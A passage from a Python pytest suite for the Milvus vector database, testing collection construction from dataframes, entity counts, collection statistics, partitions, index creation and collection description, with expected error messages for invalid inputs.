expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
target: test construct with auto_id=None
method: pass auto_id=None when constructing from a dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and do not provide ids (all primary field values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
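# set the primary column to None so the ids are generated server-side (auto_id=True)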
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: verify num entities and the auto-generated primary keys
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
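# overwrite the primary column with NaN; with auto_id=True the ids should still be generated server-side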
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, nb)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
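# NaN primary keys are floats, which conflicts with the INT64 primary field when auto_id=False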
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
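# make every primary key except the first one identical to verify duplicate ids are accepted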
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values are negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
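# replace the default primary keys with 0, -1, ..., -(nb-1) to cover negative values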
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: both collection objects are correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index has been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: the count is equal to the number of inserted entities
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index has been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: the count is equal to the number of inserted entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with a mix of L2 and JACCARD collections
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
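# first half of the collections use the default float-vector schema, second half the binary schema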
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: segment = []
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities into the collection and into one of the partitions,
        assert the value returned by count_entities method is equal to twice the length of entities
expected: the count is equal to twice the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities into each of the two partitions,
        assert the value returned by count_entities method is equal to twice the length of entities
expected: the collection count is equal to twice the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
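# alternate the index type between collections: odd loop indexes get IVF_SQ8, even ones get IVF_FLAT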
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
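# each worker thread creates one uniquely named collection; the names are collected for the final assertions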
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
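# Hedged refactoring sketch (illustrative only, not wired into the suite): the
# try/except blocks above repeatedly read `code` and `message` off the raised
# exception and compare them to expected values. A helper like the one below
# could express that pattern in one place; the attribute names mirror the
# checks already used in these tests.
def _assert_milvus_error(exc, expected_message, expected_code=1):
    """Assert that a caught exception carries the expected error code and message."""
    assert getattr(exc, 'code', None) == expected_code
    assert getattr(exc, 'message', None) == expected_message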
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
